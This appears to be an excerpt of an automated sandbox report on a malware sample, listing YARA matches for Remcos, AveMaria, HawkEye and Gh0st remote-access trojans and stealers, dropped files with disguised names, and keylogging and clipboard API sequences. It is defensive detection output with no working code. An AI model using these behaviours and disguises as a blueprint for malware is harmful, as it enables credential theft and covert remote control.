                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 7008, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004089F0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,4_2_004089F0
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404E07
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00413718 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00413718
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

                    E-Banking Fraud:

                    barindex
                    Yara detected Remcos RATShow sources
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.rem9090sta.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.745207581.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.701188305.000000000065A000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000000.713254568.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.932016894.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.715029583.0000000000757000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.709586712.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.746741703.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.935198741.000000000064A000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.714713917.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000000.730677212.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000000.740936585.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.681886689.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.746856576.0000000000497000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rem9090sta.exe PID: 7136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4200, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPED
                    Yara detected AveMaria stealerShow sources
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 3.2.bin.exe.2cee490.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 3.2.bin.exe.3644490.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 34.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 18.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
